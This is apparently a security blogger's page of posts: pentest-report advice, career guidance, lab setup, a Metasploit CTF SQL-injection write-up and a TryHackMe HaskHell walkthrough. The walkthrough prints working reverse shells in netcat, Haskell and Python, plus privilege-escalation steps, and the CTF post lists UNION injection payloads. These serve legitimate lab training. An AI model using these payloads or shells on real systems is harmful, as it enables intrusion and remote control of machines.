Overview of Talks and Workshops

Overview of Talks and Workshops

Talks-in-image-01
Talks-in-image-02
Talks-in-image-03
Talks-in-image-04
Talks-in-image-05
Talks-in-image-06
Talks-in-image-07
Talks-in-image-08
Talks-in-image-09
Talks-in-image-10
Talks-in-image-11
Talks-in-image-12
Talks-in-image-13
Talks-in-image-14
Talks-in-image-15
Talks-in-image-16
Talks-in-image-01 Talks-in-image-02 Talks-in-image-03 Talks-in-image-04 Talks-in-image-05 Talks-in-image-06 Talks-in-image-07 Talks-in-image-08 Talks-in-image-09 Talks-in-image-10 Talks-in-image-11 Talks-in-image-12 Talks-in-image-13 Talks-in-image-14 Talks-in-image-15 Talks-in-image-16

How to write a pentest report

A few month ago i passed the eWPT exam. That is when i realized that doing a pentest report could be hard for people who just broke in to the industry.

This article will try to give some simple steps on how to write a pentest report and important elements that should be in it. It aims to give professionals new to the field some advices on how to write a report for exams or for customers. It can also be used by bug hunters (the vulnerability report part).

This article is small on purpose, i want it to be clear but not too tenuous to read as the process of writing a report can seem scary to newcomers.

Why do we need a report?

A report is the document that will present all your findings and explain to every role of the company you’ve been hired by for the mandate. It will contain the scope previously defined with your customer, high level explainations of the findings and their impact as well as precise technical descriptions of every finding. There are different parts in a report.

The Executive Summary

This is the part where you need to explain for the executive of the company who will read the report. It needs to be high level explainations with no technical details.

It is relevant to add graphs of the findings such as: Vulnerabilities by impact, Attacks by type and Vulnerabilities by cause.

The definitions on Mitre CWE can help you for defining the categories to use in those graphs.

It can comport a global posture on how the findings and attack combinaison could impact your customer’s business.
It can be also useful to include a remediation priority based on your expertise and the prior discussions you had with your customer.

The Vulnerability Report

This is the part where you present each vulnerability you found. I recommend that you order those by severity.

Each vulnerability should have a score that you can calculate using CVSS scores. Here is a calculator. This score takes in account precise metrics to generate a score as close as possible to the impact the vulnerability could have. However, depending on the context of your customer the impact might not be the same, this will be your expertise and the prior conversation that you had with your customer about their business that will help you define the impact for your customer. You don’t need to tamper the CVSS metrics, this is the goal of the remediation priority i mentioned in the previous part.

Here is a way to present it:

  • Severity
  • CVSS score
  • Affected item
  • Description: you have to explain the vulnerability and explain it in the context of your target. For example: « In the context of the support page, some checks were made on the client side, but those checks could be bypassed. »
    Feel free to add resources about the vulnerability
  • Remediation: Here you have to explain how to mitigate the vulnerability. It is always good to add resources from recognized industry standards like OWASP for web pentesting reports.
  • Evidence: Here you need to add proof of the vulnerability. The goal is that the team that will implement the mitigation is able to reproduce the attack. That is why it is important that during the attacking phase you write plenty of notes and take plenty of screens and proofs.

Note: I personaly prefer when each vulnerabilty is presented with the remediation but you can also write a remediation report part right after this.

Useful Resources

Here is a great template done by Andrew Morrison (docx and odt):

  • Pentext is a collection of XML templates, XML schemas and XSLT code, which combined provide an easy way to generate IT security documents including test reports
  • Pentest standards about reporting
  • Radically Open Security provides in their portfolio some reports of project they did. Thoses are good examples.
  • MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.
  • CWE is a community-developed list of software and hardware weakness types. It serves as a common language, a measuring stick for security tools, and as a baseline for weakness identification, mitigation, and prevention efforts.
  • OWASP list of vulnerabilities (for web pentesting)
  • Exploit db is a great resource for exploitation
  • National Vulnerability Database by the US CERT

Metasploit Community CTF 2020 – 2 of Spades

Setting up the attacking machine

Access a browser and use Burp or a proxy

I wanted to explain set up details because i really think it is useful for any one who would like to play CTF and access a browser when the connexion to the attacking machine is made through ssh.

So this introduction aims to be userful for any CTF or even daily practice at you job.

You will have to use -D et -C while launching the command

sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444

-D specify the local port you wish to use for forwarding

-C is the Compression

-i to specify the location of the key file 

Then we need to set up burp under the User options tab (it can also be made under Project options, it depends if you wish to keep permanently or just for a specific project).

Then you can configure your browser proxy as it is usually done when you use Burpsuite (note: this picture is of foxyproxy a firefox add on that i would recommend to anyone who happens to work often on webpentest):

Proxychains

For this CTF my team mate CptButtStuff was using proxychains which is an amazing tool to launch a local program.

Here is how to set it up:

Open a new tab and run ssh again as follow using another port than the one you used for burp:

sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555

Edit the proxychains conf file /etc/proxychains.conf:

socks5          127.0.0.1 5555

And then you can launch a program you wish using proxychains (here i am using nmap):

proxychains nmap <IP-ADDRESS>

Cool! But how can i get file from the remote host to my local machine?

You can use scp as follow:

scp -i private_key.pem username@remote:/path/to/file /local/dir

The Challenge

Now that we have a set up ready (and not only for this chal 😀 ) we can work on 2 of spades

On port 9001 the service was http (see below the extract of my nmap scan)

9001/tcp open  http        Thin httpd
|_http-server-header: thin

When we browse to this page we get a form:

One of the first thing that comes in mind with a form is sql injection so i tried this, and got a nice error disclosing plenty of info:

' Union select 1, 2 --

This basically means that we need to try to add another col 

And there we go:

Now that we know that the backend DB is sqlite let’s find cool payloads to dump the database:

https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet

Table name enumerationSELECT name FROM sqlite_master WHERE type=’table’
Table schema enumerationSELECT sql FROM sqlite_master WHERE type=’table’
Payload chosen

I used this one and got the schema of the table

' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --

The first line is exactly the one we need so now we can query the information we need to get the flag:

' Union SELECT 1, flag, link from hidden --

And there we have our flag we just need to wget our png file and md5sum it to get the flag:

wget http://<IP>/eGHaMBu2XWvRA5cu/2_of_spades.png
md5sum 2_of_spades.png

Flag

All roads lead to Cybersecurity

It has always been difficult for me to get a concrete idea of a job. Especially in the changing world in which we live.

In the 21st century, the importance of transversal skills as meta-skills is becoming apparent. In other words, in the world of cybersecurity, a job may contain different skills needed to be effective in its practice. In cyber professions, whether technical or non-technical, learning how to learn becomes essential to adapt to a rapidly changing environment.

This demand for flexibility encourages observation, evaluation and analysis, while sharing with your peers resources, expertise and vision for protecting citizens’ data and their way of life.

Living in the 21st century disrupts traditional learning through continuous learning, but how to transform information into knowledge?

In this article I will try to answer the questions: What are the different areas of cybersecurity? What skills are needed to work in cybersecurity? What careers are there?

The different areas in Cybersecurity

The careers in Cybersecurity

Which skill for which career?

About degrees and salaries

Cybersecurity being a young field, degrees are not the only rule to get a job, the experience and motivation of the candidate remains what will make the difference for an employer. You can train yourself, pass certifications, engage with cyber security organizations to demonstrate this motivation.

How to get started with pentesting?

When people ask me about how to get into pentesting, the first i say is that practice is essential. But how to practice pentesting on your own? How to get started with virtual machines?

In this article i am going to explain, how to create a virtual attacking machine. With this machine, you will be able to practice on platforms that have « boxes ». Boxes are vulnerable machines that can be hacked. I will then present some of the website you can use for practice.

Practicing this way is very helpful because it is the closest way to understand pentest (it is not realistic but you will get the core techniques used for pentest)

How to get started ?

Create your virtual attacking machine with Kali Linux

  1. Download Virtualbox and install it: https://www.virtualbox.org/  
  2. Download Virtualbox and install it from here  
  3. Download the lastest kali linux virtualbox image (it is going to be our attacker machine) Make sure to take the virtualbox image and not the vmware one:
  1. Install Kali:
  • Go to virtualbox and click on « File » > « Import Appliance… »
  • Click on the yellow folder and navigate to the image of kali you downloaded, select it and click on open
  • Click on next and then click on import. It will take a little while… And then launch it for the first time. Username should be kali and password kali but you can find this info on their website or on the description of your machine in virtualbox
A screenshot of a social media post

Description generated with very high confidence

What website can you use?

Some great starters

First i would recommend to create an account on tryHackMe here, it’s free! Then you will have to download your configuration file and access to the VPN so you can start hacking away on their machines.

What is awesome about tryhackme is that you even have box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes. So it will not only be useful on tryhackme but also on other platforms and in your daily practice as a pentester (we do sometimes need a VPN to access our customer system to test).

If you are not familiar with VPN here is a wikipedia article explaining what it is. But simply put you can see a VPN as a tool that will give you access to another computer or environment remotely. TryHackMe and other website for pentesting practice will require a VPN so that you can access your practicing environment, usually a vulnerable machine hack.

If you are not familiar with linux, TryHackMe has a box that explains it very well, you even get a cool badge by completing it! You can also practice on overthewire.org, this website is a wargame you will be able to learn about linux and security concepts. If you want a little more explainations on concepts you should definitely go on linuxjourney.

After this you can have a look at the box on TryHackMe that introduces you to pentesting: basic pentesting.

Here is a list of great box (all free) on tryhackmefor beginners:

There are plenty more i really recommend you to have a look around.

Push your skills further with other platforms

You have covered your beginners skills? You want to go further? Here are some useful resources for this.

Writeup – TryHackMe HaskHell

Today i am going to present the write up for HaskHell on TryHackMe.

First of all after having deployed the machine, we can run nmap on the targeted IP.

Nmap

nmap -p- -sV 10.10.54.105

Result of Nmap:

kali@kali:~$ nmap -p- -sV 10.10.54.105 -T4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-11 11:40 EDT
Nmap scan report for 10.10.54.105
Host is up (0.23s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5001/tcp open  http    Gunicorn 19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1183.25 seconds

We can see that port 5001 is http and open.

Let’s have a look at Port 5001

Go to http://<target-ip>:5001

Homepage of the haskell course

If you click on « homework here » you will find a page with an exercise

Homework

The link to submit exercise respond with a 404.
Also the following screen shows us that this teacher has already had hacker’s student

Hint

This also gives us a huge hint: We can submit a haskell script and it will be interpreted. So let’s try to make a reverse shell.

But first let’s try to execute a command. Here is the documentation to execute a command with haskell: System Process on haskell

Also we need to find where to upload our script, let’s run dirb

Dirb

Dirb result
http://10.10.54.74:5001/submit
The page where we will submit our shell

Okay, now that we know where to put our script. Let’s write it!

Reverse shell with Haskell

I did not know anything about haskell so after some digging i found out that i had to save my script with .hs in the end for it to be recognized and executed by our target.

Also the text in homework1 specifies: « Your file will be compiled and ran and all output will be piped to a file under the uploads directory. »
This means that we will be able to see our output and errors in order to debug our script if we need (which was really helpful for me)

First i tried a simple ls

#!/bin/env runhaskell
import System.Process

main :: IO ()
main = do
 let stdin' = ""
 (errCode, stdout', stderr') <- readProcessWithExitCode "ls" ["-lar"] stdin'
 putStrLn $ "stdout: " ++ stdout'
 putStrLn $ "stderr: " ++ stderr'
 putStrLn $ "errCode: " ++ show errCode

And i got this:

On pentestmonkey.net we find the following command:

nc -e /bin/sh 10.0.0.1 1234

So i tried a netcat with the -e option to specify what to do after the nc.
However, there were 2 errors on my case my port 1234 was busy and the netcat command on the target did not handle -e option. Resolving the first error is easy (changed my port to 8888) but not the second one 🙂
So the script that worked for me was the following one:

module Main where 
import System.Process
 main = system "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 8888>/tmp/f"

Indeed according to this website, the following command would be handled on the other netcat versions:

#other version of netcat 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8888 >/tmp/f

Do not forget before uploading the script to launch you listener on your attacking machine

nc -lvp 8888

And then we get a shell:

And we can get the user flag:

$ ls
__pycache__
user.txt
$ cat user.txt

Now that we got user we need to get root. But first let’s find to way to avoid having to connect through our webshell. Let’s try to use ssh. If we navigate to the user .ssh folder we have a key pair.
Let’s try to get those on our attacker machine by running python simple http server.

Then from the attacking machine we can connect through ssh after having set up the proper permission for our private key (700)

To have an interactive shell we can run this:

python -c 'import pty; pty.spawn("/bin/bash")'

And there we go:

Linux enumeration with linepeas:

Let’s upload linepeas in our target machine.

On our kali we run

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

And then we launch python simple server to put it on the target

And from our target we get it with:

$ wget http://10.2.28.215:8000/linpeas.sh$ chmod 755 linepeas.sh$ ./linpeas.sh

Linepeas is very good but for this context we could have done a sudo -l before and this would have been it. It is a good habit to try this before doing anything else.

Here is what we get if we run flask:

Trying to run flask

Well it is something very useful. We know that we need to write a script and launch it as root. In my case i did a reverse shell but it can be even easier to just launch a shell with a python command.

Here is the reverse shell i did with a script:

#!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("your-ip",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

We then just have to set up a new listener on our attacker machine:

nc -lvp 8888

Se export our script to our env (target machine)

And we run our script as root from the target machine:

We get a shell from our attacking machine. So let’s run our command to get an interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'

We now have the root flag:

Getting root flag

CSNP – What is pentesting?

CyberSecurity NonProfit (CSNP) is a 501(c)(3) nonprofit organization that provides free security education and resources to make cybersecurity more accessible, inclusive, and diverse.

I was invited to talk and i discussed what pentesters do, what skills are needed, and how to start a career in pentesting. I also demonstrated web application exploits such as SQL injection and cross-site scripting (XSS).

Worldtour Podcast: série 3 épisode 1
Avec Masarah Paquet-Clouston

The World Tour Podcast
Masarah Paquet-Clouston

Masarah Paquet-Clouston est chercheuse en sécurité chez GoSecure, doctorante en criminologie à l’Université Simon Fraser et collaboratrice du projet Stratosphere IPS à Prague. Elle mène des recherches dans le domaine de la cybercriminalité. Durant les dernières années, ses recherches ont portées sur les botnets, le traçage des bitcoin, le trafic de drogue en ligne et le crime organisé. En 2016, Masarah a gagné le prix Mitacs pour sa recherche sur les « faux j’aime ».

Aujourd’hui, elle nous parle de son parcours, de ses recherches et de ses implications pour accroître la visibilité des femmes dans le domaine de la cybersécurité.

Vous pouvez suivre Masarah et ses activités de recherche sur: Google Scholar, Twitter, Linkedin

Masarah Paquet-Clouston
Ecouter sur cette page

Worldtour Podcast: Série 3 épisode 2
Avec Lisandre Cadotte

The World Tour Podcast
Lisandre Cadotte

Lisandre Cadotte est pentesteuse chez Vidéotron, une firme de télécommunication québécoise. Elle a plus de six ans d’expérience dans le domaine de la cybersécurité.

Elle participe souvent à des CTF et propose des write ups sur son site ainsi qu’une grande quantité de ressources utiles aux penteste.use.r.s. Elle est également passionnée de musique.

Dans cet épisode, Lisandre nous parle de son parcours, son métier, ainsi que de sa vision de la cybersécurité.

Vous pouvez suivre Lisandre sur Linkedin ou aller sur son site.

Lisandre Cadotte
Listen on this page